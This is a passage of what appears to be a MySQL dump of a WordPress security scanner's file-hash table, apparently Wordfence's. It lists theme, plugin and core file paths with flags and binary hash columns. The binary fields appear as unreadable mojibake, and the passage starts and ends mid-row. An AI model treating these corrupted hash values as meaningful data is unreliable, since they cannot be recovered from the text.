),('��P�n���ڱ�d�z|','wp-content/themes/fastblog/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��vcl�Pg','�q}�?\Z��/��:�C���Y�^�(������)�','',0,'?'),('��x[�e��>M�','wp-admin/includes/edit-tag-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m-I�f3�f\\Z��','u�-h�yjL��!z�V���-1�nyFY�Ý�&�','',0,'?'),('�������1�!��N','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��v06��^n��8��','wp-includes/wp-includes/link-template.php',0,'�Kn~�?��ӂ~d�','�Kn~�?��ӂ~d�','�,�P��en��y����\\A�8����2��','',0,'?'),('�<��2��O�fe�~[','wp-content/themes/Kent/guide.php',0,'�F��ɇ&�\r���&','�F��ɇ&�\r���&','�M�Ò��ӚiWD���y˺�\Z鷹�K�$�z','',0,'?'),('�L��)�6[�����','wp-content/themes/promote/images/rps_arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�4ܻ;��#\0�Ѥ�','bۿb�h������d~��x<T�|�q�T{���','',0,'?'),('�RF�D�/0����','wp-content/themes/spidermag/assets/library/bootstrap/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�0S1�v��ݣw','��iG�\Z�=LB!|�~z��6 ��RA�','',0,'?'),('�cT��ޤmF=)��','wp-includes/wp-includes/css/dist/edit-post/style.css',0,'�-��b�E��y�L�J��','�-��b�E��y�L�J��','9 �`��\'@GGXLH��K����Ħ�ᚆ','',0,'?'),('�q�h���Bc�92��','wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bh@�Uj՟���G��\'{','9;#���l+��9���\"��p�LŢ�ۈ�|','',0,'?'),('���,���7ג��','wp-content/themes/capacious/assets/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�ݲ{o�>Z��MX�','��35o��GD���{%�-�\'\Z��(#Xs���\"�','',0,'?'),('���\\F�Z�7i�','wp-content/themes/twentynineteen/sass/site/primary/_comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�\0\0�P�qSqUь�','�n�BEqO�Ȉ����}]��� ��ULryi��','',0,'?'),('��X�#�!��\n<����','wp-content/themes/capacious/inc/metabox/images/right-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\0&��r��X�&','�t����0[v#�la��jё{�a�CMR��T}�','',0,'?'),('���I:�.�X�<��!�','wp-content/themes/twentytwenty/assets/images/2020-square-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��4(��|���&�','�`�z�z�Y`]���3��)�]:a>�?oez��','',0,'?'),('��n1.Óu�t���lX','wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+@}�����nf\Z��E','Xi� t���j<u&����%C�\rA��\0�6!�','',0,'?'),('����`%��{��+��','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�%7�!��.�','{h\0,�]�z�k�V�{җ�6nG\n�x��s9�','',0,'?'),('���v��\\Q���-��','wp-includes/js/tinymce/plugins/hr/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' %>�)���;��','F��S�[k���&�f� 6+�b�>��','',0,'?'),('��S�[�e�q�{;����','wp-content/themes/pine/admin/css/pine-customize-control-color-scheme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��@�V�ӈ\\���%','�GͧS�i$����F%�N��=i�E��)�Ҭ��','',0,'?'),('�¸�{����Ywϙ','wp-content/themes/hueman/assets/global/oldBrowserCompat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����TU^�c\'b!','?H\Z�̪B�K�jL���r�/!��M��g\n�','',0,'?'),('��t��h� ,Gx�\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��R�N\Zb8M�g�|','{�����R�tH}��ܧYQ��{�F\Z�H�','',0,'?'),('�ƚ�ŏH�Wn�\'i�','wp-content/plugins/wp-cerber/assets/goo-translate.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�c�\"C�!㋫x�o','�>��Cv^��/�V����r��cCƨK(��P��','',0,'?'),('����Rx>;��]\n�ާ','wp-content/themes/advance/inc/kirki/assets/scss/controls/spacing.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��[�r�X��\n�p','7��\0bH,2�_9��&��=���]$S��T�V�','',0,'?'),('���9�X����U�7�z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�bo i�%H��Xw�Xv','ƅ1h�/jw�<U���\\�k�q%s|W�6��','',0,'?'),('��і�q��SGKy(�','wp-includes/kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>F�ނS\0wt�R��','J�Mv��CkcC^f�`ƨ� S�@`�Uny�+��','',0,'?'),('����\na-h�1�q�`','wp-content/themes/Kent/functions.php',0,'��>㞓W@�cq���-','��>㞓W@�cq���-','Kn��P{��c��Pv�R���c�`���\"TE�','',0,'?'),('��]��:S>Ud!�','wp-content/themes/gambit/css/theme-info.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g���F�U���4','m4�\n!���ţ�N(�5^��Sq����?=2��','',0,'?'),('��c�cXRd���','wp-content/themes/twentytwentyone/.stylelintrc-css.json',0,'���%fX٨�=TQ!','���%fX٨�=TQ!','rb�P�Z���#�Ue�xBS�6F셥Կ\\?�','',0,'?'),('�4�di�I�������%','wp-includes/wp-includes/js/dist/element.min.js',0,' ����)��o��^\n�',' ����)��o��^\n�','l���\Z!:�Ϋ�?!���i����;�i�','',0,'?'),('�9��l�ן? r��q�','wp-includes/class-wp-user-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Iyʰ�BzR��>�O','�gu,�$�bh�/7��C�<�l=��0x�3�x','',0,'?'),('�y�2V���iI�W^�','wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lL5�@+ou3+ym�S','T<&��C<qᮽ�v�$�e�l�w���/T �','',0,'?'),('�%��?���)�','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w]�Q�V�մi�','��q���r*���-T���N5�\r��Oc;m�a�','',0,'?'),('�&���FvW�,� ','wp-includes/wp-includes/IXR/class-IXR-request.php',0,'%p.<�Sǡ��z1Ϣ','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�3jo6ĀsߍF�j\n��','wp-content/themes/hueman/functions/init-after-setup-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NUH��@s���T�W','�P&���F�y�Ë:ŖP�ڒ�U�h1�T','',0,'?'),('�DS���3.įy}�;','wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"��ӠA�\Z����%̝','+啧���0��p�Ɯ��JMk �q�w�Xب�','',0,'?'),('�[��I�$�@�M��9','wp-content/themes/gambit/template-parts/content-small-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X���2Kؿ�����','*����E�>�k�~�c����.�NK�%�','',0,'?'),('�[�Hn[P�.~���FU|','wp-includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(������%��ӯq','?^��в�W�}T{5�3�m�T�:�锟��G','',0,'?'),('�j��\\��Ħ<y�p�','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���dz\'E�n�N��','��l.��M|yc�)�Vr�]�Ak�:Ʃ\"�A','',0,'?'),('�n��˜�Ө�n�H','wp-content/themes/auberge/assets/js/scripts-global.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','27V8˗}r�8�Bގ�','슯�,�]]�{i�\"�[j�n{�*q�9�+nA(','',0,'?'),('�z�\0��a�?�A��y','wp-content/themes/sg-window/img/icons/small/delicious.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�,��,�qXs2��','q;��?O�O�sGt>�i�\Zt}a⟑�S��H�','',0,'?'),('����tCβ��<\n��/�','wp-includes/wp-includes/embed-template.php',0,'��U�z�A>z�\'!f*','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),('�����}��U;Pq�\ZQ','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�����C~�]=?�','��Hu�r�S��!�㒦\r�r��E��b����','',0,'?'),('����Z�\Zxcy�d��\'','wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U>�p4J�l��5�=','9���\rX�L�dC5@U���K&>̓l��#�','',0,'?'),('���-�4u��\Zo�','wp-content/plugins/wp-cerber/assets/flags/ye.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t?H&��@\r\r�J�','�~��p��\"&qƝq�*��۔�QV��Y�\\F','',0,'?'),('����G)v\0 b*A��H','wp-content/themes/spidermag/spidermag/customizer/header-section/header-breaking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n[~_�e`�SX,)�','�����N3���/��$Xĸ��s�A��l�','',0,'?'),('��[�s::��q��+�','wp-content/themes/twentytwentyone/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q���M\"�BC� �','���~Բ��+@�w�GՑ.4C�O��iC���','',0,'?'),('���%�I3-�7�','wp-content/themes/twentynineteen/style-editor-customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 9�䩠�\"�\0m���','�/} ��� ��ԾA9{�!���w���a��.','',0,'?'),('�������,l̵�J�','wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php',0,'\Zjo�\0��y,�*�}c','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('���%���\\(w����&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I\0��$K�� � ','V�p\Z�1͌э�\'=~�ٲ�F_u\\��P�','',0,'?'),('��G^�2G��%�k���','wp-content/plugins/wp-cerber/assets/flags/fr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('��Gfir\0�)�|��S','wp-content/plugins/wordfence/css/phpinfo.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��Q���!�0w/�蓴','���a�@|��I\r=\Z^ε�d)�[�����W��','',0,'?'),('�����:x�=�}�','wp-includes/js/jquery/ui/mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�;��ty����','�G������[&�~ͤ�E3� �z͟��ӱ�','',0,'?'),('�œ���i����ҥ�','wp-content/themes/wp-barrister/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ŋ�4.bSF��FD��N','&� QŰXG����c���ν�A�A�i�I��','',0,'?'),('��C)�VxzϞ�ΩtP','wp-content/plugins/wp-cerber/assets/flags/um.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�xQos:h�\0A�qY','�?85�ϝ��r�o�e��[UԦM��\\','',0,'?'),('��a,V��\Z4a��*�','wp-content/themes/travel-stories/font/Lora-Bold/lora-bold.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EnD_N��Sq�C�S��','m�G�X�Z�ڸ��#a���.3Xh4�$����','',0,'?'),('��H�a�+����̰I�','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�%�S�\\!+���d�~','���8���|~�1뢇�:�HB�g撚r','',0,'?'),('��{��e�E�C��@@7','wp-includes/wp-includes/js/comment-reply.min.js',0,';Yó8y�F0��P^',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('��;�;/J�KmR��0�','wp-content/plugins/akismet/views/start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�z�\"\'�\0�\0Y7^kTj','�=P���=�y�p��y�P���*u]����*','',0,'?'),('��O�I��Y�\\�{=�H','wp-includes/robots-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��líܓM��','^�h��Ru�ɆCZ11��S���&̊p0','',0,'?'),('��y�&a�A�7�]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%���B\ng�2��;','D,�A�J���lOS�p�e؇�&���','',0,'?'),('�ƞׅ\ZX�X]�Y�F','wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('��J^��o�)�_��','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vL���Ju�6�=6�',':Հ�h=��p����˰��CB�Y�=�c','',0,'?'),('�PB�\n��Z�Y �P�','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�21����b���m� ','H���>���@+��q�j(~�]�v`�즃�\'','',0,'?'),('��OQ>�f���k�U','wp-includes/wp-includes/assets/script-loader-packages.php',0,'-�K��a�e�kb\r�5','-�K��a�e�kb\r�5','�^h&^I��nb�ކ�n:*jB�_��3�V+n�','',0,'?'),('� a\"KwT�bc1S','wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǰW��{�jڛ/$��','��j ELCo�!;u��:�蛜|�|/���3eom','',0,'?'),('�$Š@�hAI$&�O�','wp-includes/wp-includes/images/crystal/spreadsheet.png',0,'5�9�Т1�T��n��','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('�-�[ip��\\^���]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x̭&�b�+|eS�݂','�,��ɼ?��?� p�f\0qO��_���&N9','',0,'?'),('�0�&�Y�������','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�2l�Ƴ;���-6�','wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3W�T��\r�ط�18��','<�[�7�LĆ9�>gQ�:�56��bW�7��','',0,'?'),('�3!�v\'$��o=zj','wp-content/themes/advance/css/customcss/header_checkbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��ѡu�@-d\"�;','\0�9�P\Z�������bk \09\'�Z�\r���','',0,'?'),('�4g��e���>���ߝ','wp-admin/images/list-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hջIS�2��i�g�','��J�p�S_��X��#���UB�-z���,�','',0,'?'),('�;��h� $��z\n�U','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-code-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�1\n���_�K����t','D��慔�H�-���=`�u�~ ��dh�|�','',0,'?'),('�;�f�J1��˘��+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�<���^��=�f','s]ѽj$�� ��↜������Sk��ik�','',0,'?'),('�OOwT�M\r��Y�!d','wp-includes/js/mediaelement/mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('�]ǿ|������IC�','wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q��^ύ�/�','v<��K���:?�4��@�p��3<�v\0��V','',0,'?'),('�eh�z/_�i\0ͮ','wp-content/themes/hueman/assets/czr/css/img/green@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�G]>�{�� ��K','���Q�4-t��y�Sy��2�����h-','',0,'?'),('�fkj��N�Uei4=%�','wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�,�yS�h�K=�c','9|Wü��yt�ϝ���]P,is�Ǯ���S7F���','',0,'?'),('�w����}n��ըՑ','wp-content/themes/travel-stories/font/Open-Sans-Regular/opensans.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pP���G�y�k�(�','��)c�5�V�#<v;���OX��2-��','',0,'?'),('�y%���Ǻ~�ne\"V','wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rb��q\"�]�+\\','��m>� ��ӵ㿞í��\ZC��(8��(','',0,'?'),('�{�v�.��h��','wp-includes/wp-includes/class-wp-tax-query.php',0,'��}���nBJw�k�0','��}���nBJw�k�0','��,�In����\n���E,��@�h�1����','',0,'?'),('��q����|X�^#B�','wp-content/themes/auberge/assets/js/vendor/slick.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��л^��/u�^�N','r��TP\07��0]M�M���yw��ٜ�l[.��','',0,'?'),('��\Zv\0��̀Fn8���','wp-content/plugins/wp-cerber/assets/flags/tm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�d&���&����/��','�p�DƱq��ߙcc����D�J�cT5@�U�v\n','',0,'?'),('����<��k$�R�F�S','wp-includes/wp-includes/js/dist/plugins.min.js',0,'�Eg���Zm\Z��4\0�','�Eg���Zm\Z��4\0�','�ьZ;�9�c`.�Є�7��7�S��Z?��mߜ','',0,'?'),('���/�-�Tǻ�T<�S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�L��$�~ZvV��','�\"��꯹�bG�����|���E���L�ٟ,','',0,'?'),('���@�qּ���d�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php',0,'Qy���?�;�8�V\n�','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�ŕ��B^u?���3','wp-admin/images/about-color-palette.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B���i�h\n�[v���','\Z�AS��[�[��kn/�:�%��>\Z\'��_','',0,'?'),('�̎�뙎��f��9','wp-content/themes/sg-window/sidebar-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0QHL���.0L����s','JX��/�9�����y�+#��bp��?�','',0,'?'),('������^y�_\r�','wp-content/themes/sg-window/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��NiJf��\"Ԛ',':Ӎ���L�0VH�5�\'�~\0��5 GO�����','',0,'?'),('�UkH�\'�s\'P�I','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f/j�DF�)���Er','\Z�V-%F��^�#d8(��ODZ�P]�','',0,'?'),('��MFR?�yCA/�jN','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q����[ ��7�ܟ','x,��2y��g�q�~���^i���MD.#%','',0,'?'),('�)�E)�M�/^�P*x','wp-includes/wp-includes/css/dist/block-directory/style.css',0,'��?)LH\rb��pi','��?)LH\rb��pi','7h����/���/y��3L��\"�U��n��H\n��','',0,'?'),('�1�o%��q�A��','wp-admin/js/inline-edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�~<B^��k���','v-��a�F\\C�0��7C�����=VlԺ�','',0,'?'),('�1��Wɶ\"\\~�9K�','wp-content/themes/maxbusiness/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\\���p\0��9��','����x�V�HJ��<JA��lD��zp�z�%��','',0,'?'),('�H������(�d��h','wp-content/themes/event/css/responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|ώ�b�\r��|c��','x-�o��}��^;p=B��5��\0������','',0,'?'),('�LJ�į��)�','wp-content/themes/capacious/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��ot�tƪ����','6�\0���hD�ƞ�[�D�.�e��O��<�����)','',0,'?'),('�M2j��\'uB��J�\r^','wp-includes/wp-includes/js/dist/redux-routine.js',0,'K�|�WaU\0��κ�Ht','K�|�WaU\0��κ�Ht','�B&�VJ�ŋd�#�l�f��c;�}3T�%K{','',0,'?'),('�TL �߈,]��զ�m�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8� �����:{��W��e','6{w���^Gk�Ϋ�25�b��\r���','',0,'?'),('�Z�khƾ|�%�jВA','wp-content/themes/sg-window/inc/css/list.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�)ɹ@�2�f��','VA�\0����W�����ܲ��`���jd}(','',0,'?'),('�m�H�:�M���*��^','wp-includes/css/dist/editor/editor-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iۘ\"���뱠��','���by:��8�3��o�\Z������\"ڹ�','',0,'?'),('�t�:��*7A�&^','wp-content/themes/newsmag/assets/sass/typography/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�̇��� +83\0�','{��,�Sn���G�o��1�s�ճz�gu�~>\Z','',0,'?'),('�z�h9��ꈦ��Xp�+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|�F������e�','��_?7���c���:_��@���E�J��s��[','',0,'?'),('�\nad��z����ŝ<j','wp-content/themes/advance/inc/kirki/assets/js/controls/radio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Jw�[N��P���','I��\r�α���m-g����$s�=�\\�O���&+','',0,'?'),('���1XM)9���V�:','wp-content/themes/hueman/parts/post-list-author-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�D�[� 6�w�','!�.g�!�T4��xb+�QPw/b,��E','',0,'?'),('��9�n����P,��A��','wp-content/plugins/wp-cerber/assets/flags/pm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��\'�)v\rC��','`&�k$\nuxd�sh��RZ�\r��� (�Qf�','',0,'?'),('����v���V5ǃ�D�u','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ�\n�1�h;!�','�Mϡ� ����p�k��)����!\r��','',0,'?'),('����|���xY�iF','wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߔ>�j7\'\r\0��','���K\ns�DШ�D}�\0b�x:�XJ�HlN~��k','',0,'?'),('��E�S�c+��#�)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�Nm�S���C��{�','���P~�{p��}x{�8�2�hX�x���','',0,'?'),('����y�T4�!��K\n','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ol���;�tNy�>g','��d���}��;�9T���$��\'tEj�(]','',0,'?'),('��2qUh�\0Ȳ&(-','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��l~O)1��<�(','�[ɇ� �\0[+K��rJ�]��O�r1qM�\"�','',0,'?'),('��F�����{��A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{X�6��92����','G,��=����C\Z3���~f�(8��Ψ��@�,ї','',0,'?'),('��E���Q?�� (�','wp-includes/class-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j,;�\Z3�x���','��0�v�!�vv7�H�lV�d���i\'K�����','',0,'?'),('�.݁B��xK�Y�','wp-includes/ms-default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),('�\n`Z�Q*�N�v�~','wp-includes/wp-includes/sodium_compat/composer.json',0,'`��NKp@}���\r�|','`��NKp@}���\r�|','���a���<K�-��Ìb=7t�#�-8��/��`','',0,'?'),('��6����~e�{�\".w','wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���f%�(��xfn3','��0ſ���Y�~�YǦ�����m','',0,'?'),('�*O-�Lτ���\r[�u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��^Z\"^�v�\r','�\r�w�^���攗\n-�_l��<��\"���4W�X','',0,'?'),('�??n�����_2g��j','wp-includes/js/wp-util.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�J���2$J��+���','�u������g⽶����`߆�]�SR,�а�','',0,'?'),('�P_ւz���X�j�}D','wp-includes/wp-includes/class-wp-taxonomy.php',0,'Kx�om���u�5t�','Kx�om���u�5t�','��8TI�|�|C�!��`vg�#�Q!ɓ{=��','',0,'?'),('�Yg�$z�H�.Y��','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gj��z7=���','����g��%��R�C�R}<�0�]�uɬK','',0,'?'),('�\\����\\�hO����','wp-includes/wp-includes/class-wp-http-ixr-client.php',0,'�����2���5K','�����2���5K','�BVrAC\n�a�+���(�;%�FdC��TD�#��','',0,'?'),('�f�踜��\n','wp-includes/wp-includes/post-thumbnail-template.php',0,'���d��V��cꘄ','���d��V��cꘄ','G�%*�J ���$��o=�@��k����Jl�','',0,'?'),('��r9y��/���Z]�','wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js',0,'m�iz+*;)��E�','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('��`$Ϯ���O�\0i','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�В��o�a�\"��','l @> �8[w�t����?X扊�>��V}�','',0,'?'),('�Ϋ����q9�Z~Bq','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',0,'�D��]σ��2+fX','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('���Q�j.VP�6�','wp-content/themes/cactus/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�r�x�M�U@�K^','�|�\\��T6M��E�`�*\\W{��Y�Ţ��+Yo','',0,'?'),('������4��`��','wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(C�188�Aa��Z�fU','����&��u�~\0��yb���:_̶���','',0,'?'),('��\n��R�b��x���g','wp-includes/css/dist/block-library/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;.�K� Ld�-�','�-��]y|��\"c�n��$�q�0LL��c�@','',0,'?'),('��0-�V��7u=���','wp-content/themes/hueman/option-tree/includes/ot-functions-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�ծ���z^��%','lv�[r�?\"�+��_S�Ã�o��# 